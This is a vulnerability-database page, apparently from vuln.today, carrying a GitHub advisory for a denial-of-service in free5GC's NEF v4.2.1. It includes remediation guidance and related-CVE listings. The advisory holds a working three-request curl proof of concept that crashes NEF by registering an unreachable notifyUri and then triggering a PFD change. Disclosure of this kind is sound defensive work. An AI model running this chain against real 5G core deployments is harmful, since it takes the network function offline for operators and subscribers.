Severity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Remote, low-complexity, unauthenticated in v4.2.1 (SBI route groups lack auth) with a deterministic whole-process crash; no confidentiality or integrity impact, availability fully lost.
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
Lifecycle Timeline
3DescriptionGitHub Advisory
Summary
free5GC's NEF terminates the entire process when a stored PFD-subscription notifyUri cannot be reached. In PfdChangeNotifier.FlushNotifications(), the notifier calls NnefPFDmanagementNotify(...) and on any delivery error invokes logger.PFDManageLog.Fatal(err), which is os.Exit(1)-equivalent in Go. An attacker who can create a PFD subscription with an attacker-chosen notifyUri and then trigger a PFD change can deterministically kill NEF on the asynchronous delivery attempt -- the process exits with status 1, dropping NEF's entire SBI surface until restart. This is materially worse than a per-request panic-DoS (Gin recovery does not catch Fatal).
The trigger uses three POSTs that are reachable without an Authorization header in v4.2.1, because the underlying NEF SBI route groups themselves are mounted without inbound auth middleware (see free5gc/free5gc#858, free5gc/free5gc#859, free5gc/free5gc#862). So in the lab the entire chain is unauthenticated end-to-end. This advisory is scoped to the Fatal-on-delivery-failure code defect; the auth-bypass primitives are tracked separately in the upstream issues above.
Details
Validated against the NEF container in the official Docker compose lab.
- Source repo tag:
v4.2.1 - Running Docker image:
free5gc/nef:v4.2.1 - Runtime NEF commit:
5ce35eab - Docker validation date: 2026-03-20 (container log timestamp
2026-03-20T16:00:03Z) - NEF endpoint:
http://10.100.200.19:8000
Vulnerable notifier path:
_, err := nc.notifier.clientPfdManagement.PFDSubscriptionsApi.NnefPFDmanagementNotify(
context.TODO(), nc.notifier.getSubURI(id), notifyReq)
if err != nil {
logger.PFDManageLog.Fatal(err) // <-- os.Exit(1)-equivalent
}The failing branch is reached whenever NEF's outbound POST to the subscriber's notifyUri returns an error (connection refused, DNS failure, TLS error, timeout, etc.). The delivery happens asynchronously after the PFD-management transaction is accepted, so the triggering HTTP request (the PFD change) returns 201 Created and only then does NEF die.
Code evidence (paths in free5gc/nef):
- Notifier dispatch:
NFs/nef/internal/sbi/notifier/pfd_notifier.go:135- Fatal call site (process exit):
NFs/nef/internal/sbi/notifier/pfd_notifier.go:142
PoC
Reproduced end-to-end against the running NEF at http://10.100.200.19:8000 -- three unauthenticated POSTs, the third one indirectly triggers async notify -> Fatal -> process exit.
- Create an AF context (no Authorization header):
curl -i -X POST 'http://10.100.200.19:8000/3gpp-traffic-influence/v1/afdos/subscriptions' \
-H 'Content-Type: application/json' \
--data '{"afAppId":"app-nef-dos","anyUeInd":true}'HTTP/1.1 201 Created
Location: http://nef.free5gc.org:8000/3gpp-traffic-influence/v1/afdos/subscriptions/1- Create a PFD subscription with an attacker-chosen unreachable callback (port 1 = always refused locally):
curl -i -X POST 'http://10.100.200.19:8000/nnef-pfdmanagement/v1/subscriptions' \
-H 'Content-Type: application/json' \
--data '{"applicationIds":["app-nef-dos"],"notifyUri":"http://127.0.0.1:1/notify"}'HTTP/1.1 201 Created
Location: http://nef.free5gc.org:8000/nnef-pfdmanagement/v1/subscriptions/1- Trigger a PFD change so NEF tries to deliver a notification to the bad URI:
curl -i -X POST 'http://10.100.200.19:8000/3gpp-pfd-management/v1/afdos/transactions' \
-H 'Content-Type: application/json' \
--data '{"pfdDatas":{"app-nef-dos":{"externalAppId":"app-nef-dos","pfds":{"pfd1":{"pfdId":"pfd1","flowDescriptions":["permit in ip from 10.68.28.39 80 to any","permit out ip from any to 10.68.28.39 80"]}}}}}'The PFD POST itself returns 201, but immediately afterward NEF exits.
- Confirm the NEF container is dead (
exited,exit=1):
docker inspect nef --format 'status={{.State.Status}} restart={{.RestartCount}} exit={{.State.ExitCode}}'status=exited restart=0 exit=1- NEF container logs (
docker logs --since 2026-03-20T16:00:03Z nef) show the[FATA]line that terminated the process:
[INFO][NEF][PFDMng] PostPFDManagementTransactions - scsAsID[afdos]
[INFO][NEF][CTX][AFID:AF:afdos][PfdTRID:PFDT:1] New pfd transcation
[INFO][NEF][CTX][AFID:AF:afdos][PfdTRID:PFDT:1] PFD Management Transaction is added
[INFO][NEF][GIN] | 201 | POST | /3gpp-pfd-management/v1/afdos/transactions |
[FATA][NEF][PFDMng] Post "http://127.0.0.1:1/notify": dial tcp 127.0.0.1:1: connect: connection refusedImpact
Reachable assertion / fail-fast (CWE-617) inside an asynchronous notification delivery path, plus improper handling of an exceptional condition (CWE-755) (treating a transient outbound HTTP failure as fatal), plus missing input validation (CWE-20) on the attacker-supplied notifyUri. logger.Fatal is os.Exit(1)-equivalent in Go -- it skips Gin recovery, deferred cleanup, and connection draining; the whole NEF process terminates.
In v4.2.1, the trigger chain is reachable without an Authorization header because the NEF route groups used in the chain are themselves mounted without inbound auth middleware (free5gc/free5gc#858, free5gc/free5gc#859, free5gc/free5gc#862). So in the validation lab any party that can reach NEF on the SBI can:
- Submit the three-step trigger anonymously and immediately terminate the NEF process.
- Repeat the trigger after every restart to sustain the outage.
- Pick any unreachable
notifyUri(refused port, blackholed IP, DNS-NXDOMAIN, broken TLS) -- the failure branch is the sameFatal, so partial fixes that block one URI do not close the family.
No Confidentiality impact (the failure returns no attacker-readable data). No persistent Integrity impact (NEF state is in-memory and is lost when the process dies). The whole impact concentrates in Availability: complete loss of NEF service via a single attacker-controlled notification target.
Affected: free5gc v4.2.1.
Upstream issue: https://github.com/free5gc/free5gc/issues/924 Upstream fix: https://github.com/free5gc/nef/pull/25
AnalysisAI
Remote denial-of-service in free5GC's Network Exposure Function (NEF) up to v4.2.1 (nef module < 1.2.3) lets an attacker terminate the entire NEF process by pointing a PFD-management subscription at an unreachable notifyUri and then triggering a PFD change. Because the async notification handler calls logger.PFDManageLog.Fatal (an os.Exit(1) equivalent that bypasses Gin's panic recovery) on any outbound delivery error, a single accepted request kills NEF's whole SBI surface until restart. The advisory ships a full end-to-end proof-of-concept, so publicly available exploit code exists; EPSS is low (0.06%, 19th percentile) and it is not in CISA KEV.
Technical ContextAI
free5GC is an open-source implementation of a 3GPP 5G core network written in Go; the affected component is the NEF, which exposes the Service Based Interface (SBI) APIs 3gpp-traffic-influence, nnef-pfdmanagement, and 3gpp-pfd-management. The affected Go package is pkg:go/github.com/free5gc/nef. The root cause spans CWE-20 (missing validation of the attacker-supplied notifyUri, the assigned NVD weakness) together with CWE-617 (reachable assertion / fail-fast) and CWE-755 (improper handling of an exceptional condition): in PfdChangeNotifier.FlushNotifications() the outbound POST via NnefPFDmanagementNotify treats a transient HTTP error (connection refused, DNS failure, TLS error, timeout) as fatal. In Go, logger.Fatal wraps os.Exit(1), which skips deferred cleanup, connection draining, and Gin's recover() middleware, converting a per-request failure into a whole-process crash. The delivery is asynchronous, so the triggering request returns 201 Created before the process dies.
RemediationAI
Upgrade free5GC to 4.2.2 or later, which pulls in the fixed nef module 1.2.3 (Vendor-released patch: nef 1.2.3 / free5GC 4.2.2). The fix is delivered by https://github.com/free5gc/nef/pull/25 and commit f110517b1189801950b50668a593398687049074, which moves delivery into sendPFDChangeNotification and replaces logger.Fatal with logger.Errorf plus a recover() so a failed callback stays local instead of exiting the process. Where immediate upgrade is not possible, restrict network reachability of the NEF SBI so only trusted AF/NF peers can reach the /nnef-pfdmanagement, /3gpp-traffic-influence, and /3gpp-pfd-management endpoints via firewall/ACL at the interconnect, and enforce the missing SBI OAuth/authorization middleware (free5gc#858/#859/#862) so anonymous parties cannot create PFD subscriptions - the trade-off is that this only limits who can trigger the crash, not the underlying Fatal defect, and mis-scoped ACLs can break legitimate AF traffic-influence flows. Egress filtering of NEF's outbound notification traffic does not help, since any delivery error still triggers the same crash. Reference the advisory at https://github.com/free5gc/free5gc/security/advisories/GHSA-rxrq-fv76-26pr.
An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl
runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac
Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post
Path traversal in JFrog Artifactory (CWE-22) enables an authenticated low-privilege user to write data outside the inten
Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build
Remote code execution in Gogs through 0.14.2 allows authenticated users (and unauthenticated attackers on default-config
Remote code execution in Flowise before 3.1.2 allows any authenticated user (or API caller with chatflow view/update per
Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l
Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c
Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2
Same weakness CWE-20 – Improper Input Validation
View allSame technique Denial Of Service
View allVendor StatusVendor
SUSE
Severity: Important| Product | Status |
|---|---|
| SUSE Linux Enterprise Server 16.1 | Affected |
| SUSE Linux Enterprise Server for SAP applications 16.1 | Affected |
| SUSE Linux Enterprise Module for Package Hub 15 SP5 | Affected |
| SUSE Linux Enterprise Module for Package Hub 15 SP6 | Affected |
| openSUSE Leap 15.5 | Affected |
| openSUSE Leap 15.6 | Affected |
Share
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-32579
GHSA-rxrq-fv76-26pr